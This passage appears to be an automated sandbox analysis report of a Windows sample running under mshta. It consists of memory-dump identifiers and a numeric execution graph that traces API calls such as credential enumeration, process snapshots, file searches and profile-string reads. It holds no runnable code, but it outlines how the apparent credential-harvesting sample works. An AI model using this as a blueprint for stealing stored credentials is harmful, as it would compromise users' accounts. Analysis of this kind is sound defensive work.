                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 6f922dcc98d91d4811734c1656a5f86df74e1f4d4c2b678e46ef0c59869644ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000010.00000003.458567914.00000000034C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_3_34c0000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction ID: 6f922dcc98d91d4811734c1656a5f86df74e1f4d4c2b678e46ef0c59869644ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:5.5%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                    Signature Coverage:2.9%
                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                    Total number of Limit Nodes:56
                                                                                                                                                                                                                    execution_graph 37664 4466f4 37683 446904 37664->37683 37666 446700 GetModuleHandleA 37669 446710 __set_app_type __p__fmode __p__commode 37666->37669 37668 4467a4 37670 4467ac __setusermatherr 37668->37670 37671 4467b8 37668->37671 37669->37668 37670->37671 37684 4468f0 _controlfp 37671->37684 37673 4467bd _initterm GetEnvironmentStringsW _initterm 37674 44681e GetStartupInfoW 37673->37674 37675 446810 37673->37675 37677 446866 GetModuleHandleA 37674->37677 37685 41276d 37677->37685 37681 446896 exit 37682 44689d _cexit 37681->37682 37682->37675 37683->37666 37684->37673 37686 41277d 37685->37686 37728 4044a4 LoadLibraryW 37686->37728 37688 412785 37720 412789 37688->37720 37736 414b81 37688->37736 37691 4127c8 37742 412465 memset ??2@YAPAXI 37691->37742 37693 4127ea 37754 40ac21 37693->37754 37698 412813 37772 40dd07 memset 37698->37772 37699 412827 37777 40db69 memset 37699->37777 37703 40ada2 _wcsicmp 37705 41283d 37703->37705 37704 412822 37799 4125b6 ??3@YAXPAX DeleteObject 37704->37799 37705->37704 37708 412863 CoInitialize 37705->37708 37782 41268e 37705->37782 37707 412966 37800 40b1ab free free 37707->37800 37798 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37708->37798 37712 41296f 37801 40b633 37712->37801 37714 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37719 412957 CoUninitialize 37714->37719 37725 4128ca 37714->37725 37719->37704 37720->37681 37720->37682 37721 4128d0 TranslateAcceleratorW 37722 412941 GetMessageW 37721->37722 37721->37725 37722->37719 37722->37721 37723 412909 IsDialogMessageW 37723->37722 37723->37725 37724 4128fd IsDialogMessageW 37724->37722 37724->37723 37725->37721 37725->37723 37725->37724 37726 41292b TranslateMessage DispatchMessageW 37725->37726 37727 41291f IsDialogMessageW 37725->37727 37726->37722 37727->37722 37727->37726 37729 4044f7 37728->37729 37730 4044cf GetProcAddress 37728->37730 37734 404507 MessageBoxW 37729->37734 37735 40451e 37729->37735 37731 4044e8 FreeLibrary 37730->37731 37732 4044df 37730->37732 37731->37729 37733 4044f3 37731->37733 37732->37731 37733->37729 37734->37688 37735->37688 37737 414b8a 37736->37737 37738 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37736->37738 37805 40a804 memset 37737->37805 37738->37691 37741 414b9e GetProcAddress 37741->37738 37743 4124e0 37742->37743 37744 412505 ??2@YAPAXI 37743->37744 37745 41251c 37744->37745 37747 412521 37744->37747 37827 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37745->37827 37816 444722 37747->37816 37753 41259b wcscpy 37753->37693 37832 40b1ab free free 37754->37832 37758 40a9ce malloc memcpy free free 37765 40ac5c 37758->37765 37759 40ad4b 37767 40ad76 37759->37767 37856 40a9ce 37759->37856 37761 40ace7 free 37761->37765 37765->37758 37765->37759 37765->37761 37765->37767 37836 40a8d0 37765->37836 37848 4099f4 37765->37848 37766 40a8d0 7 API calls 37766->37767 37833 40aa04 37767->37833 37768 40ada2 37769 40adc9 37768->37769 37770 40adaa 37768->37770 37769->37698 37769->37699 37770->37769 37771 40adb3 _wcsicmp 37770->37771 37771->37769 37771->37770 37861 40dce0 37772->37861 37774 40dd3a GetModuleHandleW 37866 40dba7 37774->37866 37778 40dce0 3 API calls 37777->37778 37779 40db99 37778->37779 37938 40dae1 37779->37938 37952 402f3a 37782->37952 37784 412766 37784->37704 37784->37708 37785 4126d3 _wcsicmp 37786 4126a8 37785->37786 37786->37784 37786->37785 37788 41270a 37786->37788 37986 4125f8 7 API calls 37786->37986 37788->37784 37955 411ac5 37788->37955 37798->37714 37799->37707 37800->37712 37802 40b640 37801->37802 37803 40b639 free 37801->37803 37804 40b1ab free free 37802->37804 37803->37802 37804->37720 37806 40a83b GetSystemDirectoryW 37805->37806 37807 40a84c wcscpy 37805->37807 37806->37807 37812 409719 wcslen 37807->37812 37810 40a881 LoadLibraryW 37811 40a886 37810->37811 37811->37738 37811->37741 37813 409724 37812->37813 37814 409739 wcscat LoadLibraryW 37812->37814 37813->37814 37815 40972c wcscat 37813->37815 37814->37810 37814->37811 37815->37814 37817 444732 37816->37817 37818 444728 DeleteObject 37816->37818 37828 409cc3 37817->37828 37818->37817 37820 412551 37821 4010f9 37820->37821 37822 401130 37821->37822 37823 401134 GetModuleHandleW LoadIconW 37822->37823 37824 401107 wcsncat 37822->37824 37825 40a7be 37823->37825 37824->37822 37826 40a7d2 37825->37826 37826->37753 37826->37826 37827->37747 37831 409bfd memset wcscpy 37828->37831 37830 409cdb CreateFontIndirectW 37830->37820 37831->37830 37832->37765 37834 40aa14 37833->37834 37835 40aa0a free 37833->37835 37834->37768 37835->37834 37837 40a8eb 37836->37837 37838 40a8df wcslen 37836->37838 37839 40a906 free 37837->37839 37840 40a90f 37837->37840 37838->37837 37841 40a919 37839->37841 37842 4099f4 3 API calls 37840->37842 37843 40a932 37841->37843 37844 40a929 free 37841->37844 37842->37841 37846 4099f4 3 API calls 37843->37846 37845 40a93e memcpy 37844->37845 37845->37765 37847 40a93d 37846->37847 37847->37845 37849 409a41 37848->37849 37850 4099fb malloc 37848->37850 37849->37765 37852 409a37 37850->37852 37853 409a1c 37850->37853 37852->37765 37854 409a30 free 37853->37854 37855 409a20 memcpy 37853->37855 37854->37852 37855->37854 37857 40a9e7 37856->37857 37858 40a9dc free 37856->37858 37859 4099f4 3 API calls 37857->37859 37860 40a9f2 37858->37860 37859->37860 37860->37766 37885 409bca GetModuleFileNameW 37861->37885 37863 40dce6 wcsrchr 37864 40dcf5 37863->37864 37865 40dcf9 wcscat 37863->37865 37864->37865 37865->37774 37886 44db70 37866->37886 37870 40dbfd 37889 4447d9 37870->37889 37873 40dc34 wcscpy wcscpy 37915 40d6f5 37873->37915 37874 40dc1f wcscpy 37874->37873 37877 40d6f5 3 API calls 37878 40dc73 37877->37878 37879 40d6f5 3 API calls 37878->37879 37880 40dc89 37879->37880 37881 40d6f5 3 API calls 37880->37881 37882 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37881->37882 37921 40da80 37882->37921 37885->37863 37887 40dbb4 memset memset 37886->37887 37888 409bca GetModuleFileNameW 37887->37888 37888->37870 37890 4447f4 37889->37890 37891 40dc1b 37890->37891 37892 444807 ??2@YAPAXI 37890->37892 37891->37873 37891->37874 37893 44481f 37892->37893 37894 444873 _snwprintf 37893->37894 37895 4448ab wcscpy 37893->37895 37928 44474a 8 API calls 37894->37928 37897 4448bb 37895->37897 37929 44474a 8 API calls 37897->37929 37898 4448a7 37898->37895 37898->37897 37900 4448cd 37930 44474a 8 API calls 37900->37930 37902 4448e2 37931 44474a 8 API calls 37902->37931 37904 4448f7 37932 44474a 8 API calls 37904->37932 37906 44490c 37933 44474a 8 API calls 37906->37933 37908 444921 37934 44474a 8 API calls 37908->37934 37910 444936 37935 44474a 8 API calls 37910->37935 37912 44494b 37936 44474a 8 API calls 37912->37936 37914 444960 ??3@YAXPAX 37914->37891 37916 44db70 37915->37916 37917 40d702 memset GetPrivateProfileStringW 37916->37917 37918 40d752 37917->37918 37919 40d75c WritePrivateProfileStringW 37917->37919 37918->37919 37920 40d758 37918->37920 37919->37920 37920->37877 37922 44db70 37921->37922 37923 40da8d memset 37922->37923 37924 40daac LoadStringW 37923->37924 37925 40dac6 37924->37925 37925->37924 37926 40dade 37925->37926 37937 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37925->37937 37926->37704 37928->37898 37929->37900 37930->37902 37931->37904 37932->37906 37933->37908 37934->37910 37935->37912 37936->37914 37937->37925 37948 409b98 GetFileAttributesW 37938->37948 37940 40daea 37941 40daef wcscpy wcscpy GetPrivateProfileIntW 37940->37941 37947 40db63 37940->37947 37949 40d65d GetPrivateProfileStringW 37941->37949 37943 40db3e 37950 40d65d GetPrivateProfileStringW 37943->37950 37945 40db4f 37951 40d65d GetPrivateProfileStringW 37945->37951 37947->37703 37948->37940 37949->37943 37950->37945 37951->37947 37987 40eaff 37952->37987 37956 411ae2 memset 37955->37956 37957 411b8f 37955->37957 38027 409bca GetModuleFileNameW 37956->38027 37969 411a8b 37957->37969 37959 411b0a wcsrchr 37960 411b22 wcscat 37959->37960 37961 411b1f 37959->37961 38028 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37960->38028 37961->37960 37963 411b67 38029 402afb 37963->38029 37967 411b7f 38085 40ea13 SendMessageW memset SendMessageW 37967->38085 37970 402afb 27 API calls 37969->37970 37971 411ac0 37970->37971 37972 4110dc 37971->37972 37973 41113e 37972->37973 37978 4110f0 37972->37978 38110 40969c LoadCursorW SetCursor 37973->38110 37975 411143 38111 4032b4 37975->38111 38129 444a54 37975->38129 37976 4110f7 _wcsicmp 37976->37978 37977 411157 37979 40ada2 _wcsicmp 37977->37979 37978->37973 37978->37976 38132 410c46 10 API calls 37978->38132 37982 411167 37979->37982 37980 4111af 37982->37980 37983 4111a6 qsort 37982->37983 37983->37980 37986->37786 37988 40eb10 37987->37988 38000 40e8e0 37988->38000 37991 40eb6c memcpy memcpy 37992 40ebb7 37991->37992 37992->37991 37993 40ebf2 ??2@YAPAXI ??2@YAPAXI 37992->37993 37996 40d134 16 API calls 37992->37996 37994 40ec2e ??2@YAPAXI 37993->37994 37995 40ec65 37993->37995 37994->37995 38010 40ea7f 37995->38010 37996->37992 37999 402f49 37999->37786 38001 40e8f2 38000->38001 38002 40e8eb ??3@YAXPAX 38000->38002 38003 40e900 38001->38003 38004 40e8f9 ??3@YAXPAX 38001->38004 38002->38001 38005 40e911 38003->38005 38006 40e90a ??3@YAXPAX 38003->38006 38004->38003 38007 40e931 ??2@YAPAXI ??2@YAPAXI 38005->38007 38008 40e921 ??3@YAXPAX 38005->38008 38009 40e92a ??3@YAXPAX 38005->38009 38006->38005 38007->37991 38008->38009 38009->38007 38011 40aa04 free 38010->38011 38012 40ea88 38011->38012 38013 40aa04 free 38012->38013 38014 40ea90 38013->38014 38015 40aa04 free 38014->38015 38016 40ea98 38015->38016 38017 40aa04 free 38016->38017 38018 40eaa0 38017->38018 38019 40a9ce 4 API calls 38018->38019 38020 40eab3 38019->38020 38021 40a9ce 4 API calls 38020->38021 38022 40eabd 38021->38022 38023 40a9ce 4 API calls 38022->38023 38024 40eac7 38023->38024 38025 40a9ce 4 API calls 38024->38025 38026 40ead1 38025->38026 38026->37999 38027->37959 38028->37963 38086 40b2cc 38029->38086 38031 402b0a 38032 40b2cc 27 API calls 38031->38032 38033 402b23 38032->38033 38034 40b2cc 27 API calls 38033->38034 38035 402b3a 38034->38035 38036 40b2cc 27 API calls 38035->38036 38037 402b54 38036->38037 38038 40b2cc 27 API calls 38037->38038 38039 402b6b 38038->38039 38040 40b2cc 27 API calls 38039->38040 38041 402b82 38040->38041 38042 40b2cc 27 API calls 38041->38042 38043 402b99 38042->38043 38044 40b2cc 27 API calls 38043->38044 38045 402bb0 38044->38045 38046 40b2cc 27 API calls 38045->38046 38047 402bc7 38046->38047 38048 40b2cc 27 API calls 38047->38048 38049 402bde 38048->38049 38050 40b2cc 27 API calls 38049->38050 38051 402bf5 38050->38051 38052 40b2cc 27 API calls 38051->38052 38053 402c0c 38052->38053 38054 40b2cc 27 API calls 38053->38054 38055 402c23 38054->38055 38056 40b2cc 27 API calls 38055->38056 38057 402c3a 38056->38057 38058 40b2cc 27 API calls 38057->38058 38059 402c51 38058->38059 38060 40b2cc 27 API calls 38059->38060 38061 402c68 38060->38061 38062 40b2cc 27 API calls 38061->38062 38063 402c7f 38062->38063 38064 40b2cc 27 API calls 38063->38064 38065 402c99 38064->38065 38066 40b2cc 27 API calls 38065->38066 38067 402cb3 38066->38067 38068 40b2cc 27 API calls 38067->38068 38069 402cd5 38068->38069 38070 40b2cc 27 API calls 38069->38070 38071 402cf0 38070->38071 38072 40b2cc 27 API calls 38071->38072 38073 402d0b 38072->38073 38074 40b2cc 27 API calls 38073->38074 38075 402d26 38074->38075 38076 40b2cc 27 API calls 38075->38076 38077 402d3e 38076->38077 38078 40b2cc 27 API calls 38077->38078 38079 402d59 38078->38079 38080 40b2cc 27 API calls 38079->38080 38081 402d78 38080->38081 38082 40b2cc 27 API calls 38081->38082 38083 402d93 38082->38083 38084 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38083->38084 38084->37967 38085->37957 38089 40b58d 38086->38089 38088 40b2d1 38088->38031 38090 40b5a4 GetModuleHandleW FindResourceW 38089->38090 38091 40b62e 38089->38091 38092 40b5c2 LoadResource 38090->38092 38094 40b5e7 38090->38094 38091->38088 38093 40b5d0 SizeofResource LockResource 38092->38093 38092->38094 38093->38094 38094->38091 38102 40afcf 38094->38102 38096 40b608 memcpy 38105 40b4d3 memcpy 38096->38105 38098 40b61e 38106 40b3c1 18 API calls 38098->38106 38100 40b626 38107 40b04b 38100->38107 38103 40b04b ??3@YAXPAX 38102->38103 38104 40afd7 ??2@YAPAXI 38103->38104 38104->38096 38105->38098 38106->38100 38108 40b051 ??3@YAXPAX 38107->38108 38109 40b05f 38107->38109 38108->38109 38109->38091 38110->37975 38112 4032c4 38111->38112 38113 40b633 free 38112->38113 38114 403316 38113->38114 38133 44553b 38114->38133 38118 403480 38331 40368c 15 API calls 38118->38331 38120 403489 38121 40b633 free 38120->38121 38122 403495 38121->38122 38122->37977 38123 4033a9 memset memcpy 38124 4033ec wcscmp 38123->38124 38125 40333c 38123->38125 38124->38125 38125->38118 38125->38123 38125->38124 38329 4028e7 11 API calls 38125->38329 38330 40f508 6 API calls 38125->38330 38127 403421 _wcsicmp 38127->38125 38130 444a64 FreeLibrary 38129->38130 38131 444a83 38129->38131 38130->38131 38131->37977 38132->37978 38134 445548 38133->38134 38135 445599 38134->38135 38332 40c768 38134->38332 38136 4455a8 memset 38135->38136 38143 4457f2 38135->38143 38418 403988 38136->38418 38147 445854 38143->38147 38521 403e2d memset memset memset memset memset 38143->38521 38144 445672 38429 403fbe memset memset memset memset memset 38144->38429 38145 4458bb memset memset 38150 414c2e 17 API calls 38145->38150 38195 4458aa 38147->38195 38544 403c9c memset memset memset memset memset 38147->38544 38148 44595e memset memset 38154 414c2e 17 API calls 38148->38154 38149 4455e5 38149->38144 38157 44560f 38149->38157 38155 4458f9 38150->38155 38151 44557a 38192 44558c 38151->38192 38398 4136c0 38151->38398 38153 445a00 memset memset 38164 414c2e 17 API calls 38153->38164 38165 44599c 38154->38165 38166 40b2cc 27 API calls 38155->38166 38169 4087b3 338 API calls 38157->38169 38159 445849 38612 40b1ab free free 38159->38612 38160 445bca 38167 445c8b memset memset 38160->38167 38234 445cf0 38160->38234 38161 445b38 memset memset memset 38172 445bd4 38161->38172 38173 445b98 38161->38173 38174 445a3e 38164->38174 38176 40b2cc 27 API calls 38165->38176 38168 445909 38166->38168 38180 414c2e 17 API calls 38167->38180 38177 409d1f 6 API calls 38168->38177 38178 445621 38169->38178 38171 44589f 38613 40b1ab free free 38171->38613 38567 414c2e 38172->38567 38173->38172 38182 445ba2 38173->38182 38185 40b2cc 27 API calls 38174->38185 38179 4459ac 38176->38179 38188 445919 38177->38188 38598 4454bf 20 API calls 38178->38598 38190 409d1f 6 API calls 38179->38190 38191 445cc9 38180->38191 38705 4099c6 wcslen 38182->38705 38183 4456b2 38600 40b1ab free free 38183->38600 38196 445a4f 38185->38196 38187 403335 38328 4452e5 45 API calls 38187->38328 38614 409b98 GetFileAttributesW 38188->38614 38189 445823 38189->38159 38202 4087b3 338 API calls 38189->38202 38204 4459bc 38190->38204 38205 409d1f 6 API calls 38191->38205 38402 444b06 38192->38402 38193 445879 38193->38171 38215 4087b3 338 API calls 38193->38215 38195->38145 38220 44594a 38195->38220 38208 409d1f 6 API calls 38196->38208 38199 445d3d 38219 40b2cc 27 API calls 38199->38219 38200 445d88 memset memset memset 38203 414c2e 17 API calls 38200->38203 38202->38189 38212 445dde 38203->38212 38681 409b98 GetFileAttributesW 38204->38681 38214 445ce1 38205->38214 38206 445bb3 38708 445403 memset 38206->38708 38207 445680 38207->38183 38452 4087b3 memset 38207->38452 38217 445a63 38208->38217 38209 40b2cc 27 API calls 38218 445bf3 38209->38218 38210 445928 38210->38220 38615 40b6ef 38210->38615 38221 40b2cc 27 API calls 38212->38221 38725 409b98 GetFileAttributesW 38214->38725 38215->38193 38226 40b2cc 27 API calls 38217->38226 38583 409d1f wcslen wcslen 38218->38583 38229 445d54 _wcsicmp 38219->38229 38220->38148 38233 4459ed 38220->38233 38232 445def 38221->38232 38222 4459cb 38222->38233 38243 40b6ef 253 API calls 38222->38243 38236 445a94 38226->38236 38240 445d71 38229->38240 38306 445d67 38229->38306 38231 445665 38599 40b1ab free free 38231->38599 38241 409d1f 6 API calls 38232->38241 38233->38153 38276 445b22 38233->38276 38234->38187 38234->38199 38234->38200 38235 445389 259 API calls 38235->38160 38682 40ae18 38236->38682 38237 44566d 38237->38143 38503 413d4c 38237->38503 38726 445093 23 API calls 38240->38726 38249 445e03 38241->38249 38243->38233 38245 4456d8 38250 40b2cc 27 API calls 38245->38250 38248 44563c 38248->38231 38253 4087b3 338 API calls 38248->38253 38727 409b98 GetFileAttributesW 38249->38727 38256 4456e2 38250->38256 38251 40b2cc 27 API calls 38257 445c23 38251->38257 38252 445d83 38252->38187 38253->38248 38255 40b6ef 253 API calls 38255->38187 38601 413fa6 _wcsicmp _wcsicmp 38256->38601 38261 409d1f 6 API calls 38257->38261 38259 445e12 38266 445e6b 38259->38266 38272 40b2cc 27 API calls 38259->38272 38264 445c37 38261->38264 38262 445aa1 38265 445b17 38262->38265 38280 445ab2 memset 38262->38280 38294 409d1f 6 API calls 38262->38294 38302 445389 259 API calls 38262->38302 38689 40add4 38262->38689 38694 40ae51 38262->38694 38263 4456eb 38268 4456fd memset memset memset memset 38263->38268 38269 4457ea 38263->38269 38270 445389 259 API calls 38264->38270 38702 40aebe 38265->38702 38729 445093 23 API calls 38266->38729 38602 409c70 wcscpy wcsrchr 38268->38602 38605 413d29 38269->38605 38275 445c47 38270->38275 38277 445e33 38272->38277 38282 40b2cc 27 API calls 38275->38282 38276->38160 38276->38161 38283 409d1f 6 API calls 38277->38283 38279 445e7e 38284 445f67 38279->38284 38285 40b2cc 27 API calls 38280->38285 38287 445c53 38282->38287 38288 445e47 38283->38288 38289 40b2cc 27 API calls 38284->38289 38285->38262 38286 409c70 2 API calls 38290 44577e 38286->38290 38291 409d1f 6 API calls 38287->38291 38728 409b98 GetFileAttributesW 38288->38728 38293 445f73 38289->38293 38295 409c70 2 API calls 38290->38295 38296 445c67 38291->38296 38298 409d1f 6 API calls 38293->38298 38294->38262 38299 44578d 38295->38299 38300 445389 259 API calls 38296->38300 38297 445e56 38297->38266 38303 445e83 memset 38297->38303 38301 445f87 38298->38301 38299->38269 38305 40b2cc 27 API calls 38299->38305 38300->38160 38732 409b98 GetFileAttributesW 38301->38732 38302->38262 38307 40b2cc 27 API calls 38303->38307 38309 4457a8 38305->38309 38306->38187 38306->38255 38308 445eab 38307->38308 38310 409d1f 6 API calls 38308->38310 38311 409d1f 6 API calls 38309->38311 38312 445ebf 38310->38312 38313 4457b8 38311->38313 38314 40ae18 9 API calls 38312->38314 38604 409b98 GetFileAttributesW 38313->38604 38324 445ef5 38314->38324 38316 4457c7 38316->38269 38318 4087b3 338 API calls 38316->38318 38317 40ae51 9 API calls 38317->38324 38318->38269 38319 445f5c 38321 40aebe FindClose 38319->38321 38320 40add4 2 API calls 38320->38324 38321->38284 38322 40b2cc 27 API calls 38322->38324 38323 409d1f 6 API calls 38323->38324 38324->38317 38324->38319 38324->38320 38324->38322 38324->38323 38326 445f3a 38324->38326 38730 409b98 GetFileAttributesW 38324->38730 38731 445093 23 API calls 38326->38731 38328->38125 38329->38127 38330->38125 38331->38120 38333 40c775 38332->38333 38733 40b1ab free free 38333->38733 38335 40c788 38734 40b1ab free free 38335->38734 38337 40c790 38735 40b1ab free free 38337->38735 38339 40c798 38340 40aa04 free 38339->38340 38341 40c7a0 38340->38341 38736 40c274 memset 38341->38736 38346 40a8ab 9 API calls 38347 40c7c3 38346->38347 38348 40a8ab 9 API calls 38347->38348 38349 40c7d0 38348->38349 38765 40c3c3 38349->38765 38353 40c877 38362 40bdb0 38353->38362 38354 40c86c 38793 4053fe 39 API calls 38354->38793 38357 40c813 _wcslwr 38791 40c634 50 API calls 38357->38791 38359 40c829 wcslen 38360 40c7e5 38359->38360 38360->38353 38360->38354 38790 40a706 wcslen memcpy 38360->38790 38792 40c634 50 API calls 38360->38792 38954 404363 38362->38954 38365 40bf5d 38974 40440c 38365->38974 38367 40bdee 38367->38365 38370 40b2cc 27 API calls 38367->38370 38368 40bddf CredEnumerateW 38368->38367 38371 40be02 wcslen 38370->38371 38371->38365 38378 40be1e 38371->38378 38372 40be26 wcsncmp 38372->38378 38375 40be7d memset 38376 40bea7 memcpy 38375->38376 38375->38378 38377 40bf11 wcschr 38376->38377 38376->38378 38377->38378 38378->38365 38378->38372 38378->38375 38378->38376 38378->38377 38379 40b2cc 27 API calls 38378->38379 38381 40bf43 LocalFree 38378->38381 38977 40bd5d 28 API calls 38378->38977 38978 404423 38378->38978 38380 40bef6 _wcsnicmp 38379->38380 38380->38377 38380->38378 38381->38378 38382 4135f7 38993 4135e0 38382->38993 38385 40b2cc 27 API calls 38386 41360d 38385->38386 38387 40a804 8 API calls 38386->38387 38388 413613 38387->38388 38389 41363e 38388->38389 38390 40b273 27 API calls 38388->38390 38391 4135e0 FreeLibrary 38389->38391 38392 413625 GetProcAddress 38390->38392 38393 413643 38391->38393 38392->38389 38394 413648 38392->38394 38393->38151 38395 413658 38394->38395 38396 4135e0 FreeLibrary 38394->38396 38395->38151 38397 413666 38396->38397 38397->38151 38400 4136e2 38398->38400 38399 413827 38597 41366b FreeLibrary 38399->38597 38400->38399 38401 4137ac CoTaskMemFree 38400->38401 38401->38400 38996 4449b9 38402->38996 38405 444c1f 38405->38135 38406 4449b9 42 API calls 38408 444b4b 38406->38408 38407 444c15 38410 4449b9 42 API calls 38407->38410 38408->38407 39017 444972 GetVersionExW 38408->39017 38410->38405 38411 444b99 memcmp 38416 444b8c 38411->38416 38412 444c0b 39021 444a85 42 API calls 38412->39021 38416->38411 38416->38412 39018 444aa5 42 API calls 38416->39018 39019 40a7a0 GetVersionExW 38416->39019 39020 444a85 42 API calls 38416->39020 38419 40399d 38418->38419 39022 403a16 38419->39022 38421 403a09 39036 40b1ab free free 38421->39036 38423 4039a3 38423->38421 38427 4039f4 38423->38427 39033 40a02c CreateFileW 38423->39033 38424 403a12 wcsrchr 38424->38149 38427->38421 38428 4099c6 2 API calls 38427->38428 38428->38421 38430 414c2e 17 API calls 38429->38430 38431 404048 38430->38431 38432 414c2e 17 API calls 38431->38432 38433 404056 38432->38433 38434 409d1f 6 API calls 38433->38434 38435 404073 38434->38435 38436 409d1f 6 API calls 38435->38436 38437 40408e 38436->38437 38438 409d1f 6 API calls 38437->38438 38439 4040a6 38438->38439 38440 403af5 20 API calls 38439->38440 38441 4040ba 38440->38441 38442 403af5 20 API calls 38441->38442 38443 4040cb 38442->38443 39063 40414f memset 38443->39063 38445 404140 39077 40b1ab free free 38445->39077 38446 4040ec memset 38450 4040e0 38446->38450 38448 404148 38448->38207 38449 4099c6 2 API calls 38449->38450 38450->38445 38450->38446 38450->38449 38451 40a8ab 9 API calls 38450->38451 38451->38450 39090 40a6e6 WideCharToMultiByte 38452->39090 38454 4087ed 39091 4095d9 memset 38454->39091 38457 408953 38457->38207 38458 408809 memset memset memset memset memset 38459 40b2cc 27 API calls 38458->38459 38460 4088a1 38459->38460 38461 409d1f 6 API calls 38460->38461 38462 4088b1 38461->38462 38463 40b2cc 27 API calls 38462->38463 38464 4088c0 38463->38464 38465 409d1f 6 API calls 38464->38465 38466 4088d0 38465->38466 38467 40b2cc 27 API calls 38466->38467 38468 4088df 38467->38468 38469 409d1f 6 API calls 38468->38469 38470 4088ef 38469->38470 38471 40b2cc 27 API calls 38470->38471 38472 4088fe 38471->38472 38473 409d1f 6 API calls 38472->38473 38474 40890e 38473->38474 38475 40b2cc 27 API calls 38474->38475 38476 40891d 38475->38476 38477 409d1f 6 API calls 38476->38477 38478 40892d 38477->38478 39108 409b98 GetFileAttributesW 38478->39108 38480 40893e 38481 408943 38480->38481 38504 40b633 free 38503->38504 38505 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38504->38505 38506 413f00 Process32NextW 38505->38506 38507 413da5 OpenProcess 38506->38507 38508 413f17 CloseHandle 38506->38508 38509 413eb0 38507->38509 38510 413df3 memset 38507->38510 38508->38245 38509->38506 38512 413ebf free 38509->38512 38513 4099f4 3 API calls 38509->38513 39140 413f27 38510->39140 38512->38509 38513->38509 38514 413e37 GetModuleHandleW 38516 413e46 GetProcAddress 38514->38516 38518 413e1f 38514->38518 38516->38518 38517 413e6a QueryFullProcessImageNameW 38517->38518 38518->38514 38518->38517 39145 413959 38518->39145 39161 413ca4 38518->39161 38520 413ea2 CloseHandle 38520->38509 38522 414c2e 17 API calls 38521->38522 38523 403eb7 38522->38523 38524 414c2e 17 API calls 38523->38524 38525 403ec5 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 403ee2 38526->38527 38528 409d1f 6 API calls 38527->38528 38529 403efd 38528->38529 38530 409d1f 6 API calls 38529->38530 38531 403f15 38530->38531 38532 403af5 20 API calls 38531->38532 38533 403f29 38532->38533 38534 403af5 20 API calls 38533->38534 38535 403f3a 38534->38535 38536 40414f 33 API calls 38535->38536 38542 403f4f 38536->38542 38537 403faf 39175 40b1ab free free 38537->39175 38538 403f5b memset 38538->38542 38540 403fb7 38540->38189 38541 4099c6 2 API calls 38541->38542 38542->38537 38542->38538 38542->38541 38543 40a8ab 9 API calls 38542->38543 38543->38542 38545 414c2e 17 API calls 38544->38545 38546 403d26 38545->38546 38547 414c2e 17 API calls 38546->38547 38548 403d34 38547->38548 38549 409d1f 6 API calls 38548->38549 38550 403d51 38549->38550 38551 409d1f 6 API calls 38550->38551 38552 403d6c 38551->38552 38553 409d1f 6 API calls 38552->38553 38554 403d84 38553->38554 38555 403af5 20 API calls 38554->38555 38556 403d98 38555->38556 38557 403af5 20 API calls 38556->38557 38558 403da9 38557->38558 38559 40414f 33 API calls 38558->38559 38564 403dbe 38559->38564 38560 403e1e 39176 40b1ab free free 38560->39176 38562 403dca memset 38562->38564 38563 403e26 38563->38193 38564->38560 38564->38562 38565 4099c6 2 API calls 38564->38565 38566 40a8ab 9 API calls 38564->38566 38565->38564 38566->38564 38568 414b81 9 API calls 38567->38568 38570 414c40 38568->38570 38569 414c73 memset 38571 414c94 38569->38571 38570->38569 39177 409cea 38570->39177 39180 414592 RegOpenKeyExW 38571->39180 38575 414c64 SHGetSpecialFolderPathW 38576 414d0b 38575->38576 38576->38209 38577 414cc1 38578 414cf4 wcscpy 38577->38578 39181 414bb0 wcscpy 38577->39181 38578->38576 38580 414cd2 39182 4145ac RegQueryValueExW 38580->39182 38582 414ce9 RegCloseKey 38582->38578 38584 409d62 38583->38584 38585 409d43 wcscpy 38583->38585 38588 445389 38584->38588 38586 409719 2 API calls 38585->38586 38587 409d51 wcscat 38586->38587 38587->38584 38589 40ae18 9 API calls 38588->38589 38595 4453c4 38589->38595 38590 40ae51 9 API calls 38590->38595 38591 4453f3 38593 40aebe FindClose 38591->38593 38592 40add4 2 API calls 38592->38595 38594 4453fe 38593->38594 38594->38251 38595->38590 38595->38591 38595->38592 38596 445403 254 API calls 38595->38596 38596->38595 38597->38192 38598->38248 38599->38237 38600->38237 38601->38263 38603 409c89 38602->38603 38603->38286 38604->38316 38606 413d39 38605->38606 38607 413d2f FreeLibrary 38605->38607 38608 40b633 free 38606->38608 38607->38606 38609 413d42 38608->38609 38610 40b633 free 38609->38610 38611 413d4a 38610->38611 38611->38143 38612->38147 38613->38195 38614->38210 38616 44db70 38615->38616 38617 40b6fc memset 38616->38617 38618 